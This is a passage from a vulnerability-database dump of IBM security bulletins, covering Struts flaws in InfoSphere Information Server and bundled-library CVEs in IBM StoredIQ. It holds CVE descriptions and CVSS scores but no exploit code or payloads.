Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n07 October 2016: Original version published \n20 October 2016: Publish fix for Metadata Workbench version 8.7 \n2 December 2016: For version 11.5, Governance Rollup 5 can be used instead of Governance Rollup 4 + IGC JR56313 patches\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Internal Use Only\n\nPSIRT 79202\n\n[{\"Product\":{\"code\":\"SSZJPZ\",\"label\":\"IBM InfoSphere Information Server\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"9.1;8.7;8.5;11.5;11.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}},{\"Product\":{\"code\":\"SSZJPZ\",\"label\":\"IBM InfoSphere Information Server\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"9.1;8.7;8.5;11.5;11.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T13:42:18", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in Struts affect IBM InfoSphere Information Server", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0785", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-2162", "CVE-2016-3081", "CVE-2016-3082", "CVE-2016-3087", "CVE-2016-3093", "CVE-2016-4003", "CVE-2016-4430", "CVE-2016-4431", "CVE-2016-4433", "CVE-2016-4436", "CVE-2016-4438", "CVE-2016-4465"], "modified": "2018-06-16T13:42:18", "id": "F7297DEE78789012F7802C00A7D437B06424929237D39542808A1D9905687922", "href": "https://www.ibm.com/support/pages/node/549551", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T21:58:43", "description": "## Summary\n\nMultiple vulnerabilities in bundled software packages affect IBM StoredIQ. IBM StoredIQ has addressed the applicable CVEs.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2009-0217](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0217>) \n**DESCRIPTION: **The design of the W3C XML Signature Syntax and Processing (XMLDsig) recommendation, as implemented in products including (1) the Oracle Security Developer Tools component in Oracle Application Server 10.1.2.3, 10.1.3.4, and 10.1.4.3IM; (2) the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, and 8.1 SP6; (3) Mono before 2.4.2.2; (4) XML Security Library before 1.2.12; (5) IBM WebSphere Application Server Versions 6.0 through 6.0.2.33, 6.1 through 6.1.0.23, and 7.0 through 7.0.0.1; (6) Sun JDK and JRE Update 14 and earlier; (7) Microsoft .NET Framework 3.0 through 3.0 SP2, 3.5, and 4.0; and other products uses a parameter that defines an HMAC truncation length (HMACOutputLength) but does not require a minimum for this length, which allows attackers to spoof HMAC-based signatures and bypass authentication by specifying a truncation length with a small number of bits. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/51716](<https://exchange.xforce.ibmcloud.com/vulnerabilities/51716>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n\n \n**CVEID: **[CVE-2012-5783](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5783>) \n**DESCRIPTION: **Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/79984](<https://exchange.xforce.ibmcloud.com/vulnerabilities/79984>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n\n \n**CVEID: **[CVE-2012-2098](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2098>) \n**DESCRIPTION: **Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/75857](<https://exchange.xforce.ibmcloud.com/vulnerabilities/75857>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n\n \n**CVEID: **[CVE-2017-3589](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3589>) \n**DESCRIPTION: **Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/J). Supported versions that are affected are 5.1.41 and earlier. Easily \"exploitable\" vulnerability allows low privileged attacker with logon to the infrastructure where MySQL Connectors executes to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Connectors accessible data. CVSS 3.0 Base Score 3.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N). \nCVSS Base score: 3.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/124962](<https://exchange.xforce.ibmcloud.com/vulnerabilities/124962>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n\n \n**CVEID: **[CVE-2017-3586](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3586>) \n**DESCRIPTION: **Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/J). Supported versions that are affected are 5.1.41 and earlier. Easily \"exploitable\" vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Connectors. While the vulnerability is in MySQL Connectors, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Connectors accessible data as well as unauthorized read access to a subset of MySQL Connectors accessible data. CVSS 3.0 Base Score 6.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N). \nCVSS Base score: 6.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/124960](<https://exchange.xforce.ibmcloud.com/vulnerabilities/124960>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) \n\n \n**CVEID: **[CVE-2017-3523](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3523>) \n**DESCRIPTION: **Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/J). Supported versions that are affected are 5.1.40 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Connectors. While the vulnerability is in MySQL Connectors, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.0 Base Score 8.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H). \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/126183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/126183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2014-0114](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114>) \n**DESCRIPTION: **Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92889](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n\n \n**CVEID: **[CVE-2010-1632](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1632>) \n**DESCRIPTION: **Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService. \nCVSS Base score: 5.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/59588](<https://exchange.xforce.ibmcloud.com/vulnerabilities/59588>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:P) \n\n \n**CVEID: **[CVE-2009-2625](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2625>) \n**DESCRIPTION: **XMLScanner.java in Apache Xerces2 Java, asused in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/53082](<https://exchange.xforce.ibmcloud.com/vulnerabilities/53082>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n\n \n**CVEID: **[CVE-2013-4002](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002>) \n**DESCRIPTION: **XMLscanner.java in Apache Xerces2 Java Parser before 2.12.0, as used in the Java Runtime Environment (JRE) in IBM Java 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6, and 7 before 7 SR5 as well as Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, Java SE Embedded 7u40 and earlier, and possibly other products allows remote attackers to cause adenial of service via vectors related to XML attribute names. \nCVSS Base score: 7.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85260](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85260>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:N/A:C) \n\n \n**CVEID: **[CVE-2012-0881](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0881>) \n**DESCRIPTION: **Apache Xerces2 Java Parser before 2.12.0 allows remote attackers to cause a denial of service (CPU consumption) via a crafted message to an XML service, which triggers hash table collisions. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/134404](<https://exchange.xforce.ibmcloud.com/vulnerabilities/134404>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n\n \n**CVEID: **[CVE-2015-6420](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6420>) \n**DESCRIPTION: **Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2017-15708](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15708>) \n**DESCRIPTION: **In Apache Synapse, by default no authentication is required for Java Remote Method Invocation (RMI). So Apache Synapse 3.0.1 or all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allows remote code execution attacks that can be performed by injecting specially crafted serialized objects. And the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions in Synapse distribution makes this exploitable. To mitigate the issue, we need to limit RMI access to trusted users only. Further upgrading to 3.0.1 version will eliminate the risk of having said Commons Collection version. In Synapse 3.0.1, Commons Collection has been updated to 3.2.2 version. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/136262](<https://exchange.xforce.ibmcloud.com/vulnerabilities/136262>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2013-0248](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0248>) \n**DESCRIPTION: **The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack. \nCVSS Base score: 3.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/82618](<https://exchange.xforce.ibmcloud.com/vulnerabilities/82618>) for the current score. \nCVSS Vector: (AV:L/AC:M/Au:N/C:N/I:P/A:P) \n\n \n**CVEID: **[CVE-2016-1000031](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000031>) \n**DESCRIPTION: **Apache Commons FileUpload before 1.3.3 DiskFileItem File Manipulation Remote Code Execution \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/117957](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2014-0050](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050>) \n**DESCRIPTION: **MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/90987](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90987>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n\n \n**CVEID: **[CVE-2018-20433](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20433>) \n**DESCRIPTION: **c3p0 0.9.5.2 allows XXE in extractXmlConfigFromInputStream in com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java during initialization. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/154680](<https://exchange.xforce.ibmcloud.com/vulnerabilities/154680>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N) \n\n \n**CVEID: **[CVE-2019-5427](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5427>) \n**DESCRIPTION: **c3p0 version < 0.9.5.4 may be exploited by a billion laughs attack when loading XML configuration due to missing protections against recursive entity expansion when loading configuration. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/160025](<https://exchange.xforce.ibmcloud.com/vulnerabilities/160025>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n\n \n**CVEID: **[CVE-2012-5055](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5055>) \n**DESCRIPTION: **DaoAuthenticationProvider in VMware SpringSource Spring Security before 2.0.8, 3.0.x before 3.0.8, and 3.1.x before 3.1.3 does not check the password if the user is not found, which makes the response delay shorter and might allow remote attackers to enumerate valid usernames via a series of login requests. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/80568](<https://exchange.xforce.ibmcloud.com/vulnerabilities/80568>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n\n \n**CVEID: **[CVE-2016-3093](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3093>) \n**DESCRIPTION: **Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/113686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n\n \n**CVEID: **[CVE-2016-5725](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5725>) \n**DESCRIPTION: **Directory traversal vulnerability in JCraft JSch before 0.1.54 on Windows, when the mode is ChannelSftp.OVERWRITE, allows remote SFTP servers to write to arbitrary files via a ..\\ (dot dot backslash) in a response to a recursive GET command. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/117122](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117122>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n\n \n**CVEID: **[CVE-2018-10237](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10237>) \n**DESCRIPTION: **Unbounded memory allocation in Google Guava 11.0 through 24.x before 24.1.1 allows remote attackers to conduct denial of service attacks against servers that depend on this library and deserialize attacker-provided data, because the AtomicDoubleArray class (when serialized with Java serialization) and the CompoundOrdering class (when serialized with GWT serialization) perform eager allocation without appropriate checks on what a client has sent and whether the data size is reasonable. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/142508](<https://exchange.xforce.ibmcloud.com/vulnerabilities/142508>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n\n \n**CVEID: **[CVE-2012-5783](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5783>) \n**DESCRIPTION: **Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/79984](<https://exchange.xforce.ibmcloud.com/vulnerabilities/79984>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n\n \n**CVEID: **[CVE-2019-5427](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5427>) \n**DESCRIPTION: **c3p0 version < 0.9.5.4 may be exploited by a billion laughs attack when loading XML configuration due to missing protections against recursive entity expansion when loading configuration. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/160025](<https://exchange.xforce.ibmcloud.com/vulnerabilities/160025>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n\n \n**CVEID: **[CVE-2012-2098](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2098>) \n**DESCRIPTION: **Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/75857](<https://exchange.xforce.ibmcloud.com/vulnerabilities/75857>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n\n \n**CVEID: **[CVE-2014-3578](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3578>) \n**DESCRIPTION: **Directory traversal vulnerability in Pivotal Spring Framework 3.x before 3.2.9 and 4.0 before 4.0.5 allows remote attackers to read arbitrary files via a crafted URL. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/93774](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93774>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n\n \n**CVEID: **[CVE-2018-1272](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1272>) \n**DESCRIPTION: **Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, provide client-side support for multipart requests. When Spring MVC or Spring WebFlux server application (server A) receives input from a remote client, and then uses that input to make a multipart request to another server (server B), it can be exposed to an attack, where an extra multipart is inserted in the content of the request from server A, causing server B to use the wrong value for a part it expects. This could to lead privilege escalation, for example, if the part content represents a username or user roles. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141286](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141286>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L) \n\n \n**CVEID: **[CVE-2014-3603](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3603>) \n**DESCRIPTION: **The (1) HttpResource and (2) FileBackedHttpResource implementations in Shibboleth Identity Provider (IdP) before 2.4.1 and OpenSAML Java 2.6.2 do not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/164271](<https://exchange.xforce.ibmcloud.com/vulnerabilities/164271>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N) \n\n \n**CVEID: **[CVE-2015-1796](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1796>) \n**DESCRIPTION: **The PKIX trust engines in Shibboleth Identity Provider before 2.4.4 and OpenSAML Java (OpenSAML-J) before 2.6.5 trust candidate X.509 credentials when no trusted names are available for the entityID, which allows remote attackers to impersonate an entity via a certificate issued by a shibmd:KeyAuthority trust anchor. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/105594](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105594>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n\n \n**CVEID: **[CVE-2017-5645](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5645>) \n**DESCRIPTION: **In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/127479](<https://exchange.xforce.ibmcloud.com/vulnerabilities/127479>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2017-7957](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7957>) \n**DESCRIPTION: **XStream through 1.4.9, when a certain denyTypes workaround is not used, mishandles attempts to create an instance of the primitive type 'void' during unmarshalling, leading to a remote application crash, as demonstrated by an xstream.fromXML(\"<void/>\") call. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/125800](<https://exchange.xforce.ibmcloud.com/vulnerabilities/125800>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n\n \n**CVEID: **[CVE-2016-3674](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3674>) \n**DESCRIPTION: **Multiple XML external entity (XXE) vulnerabilities in the (1) Dom4JDriver, (2) DomDriver, (3) JDomDriver, (4) JDom2Driver, (5) SjsxpDriver, (6) StandardStaxDriver, and (7) WstxDriver drivers in XStream before 1.4.9 allow remote attackers to read arbitrary files via a crafted XML document. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111806](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111806>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n\n \n**CVEID: **[CVE-2013-7285](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7285>) \n**DESCRIPTION: **Xstream API versions up to 1.4.6 and version 1.4.10, if the security framework has not been initialized, may allow a remote attacker to run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. e.g. JSON. \nCVSS Base score: 6.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/90229](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90229>) for the current score. \nCVSS Vector: 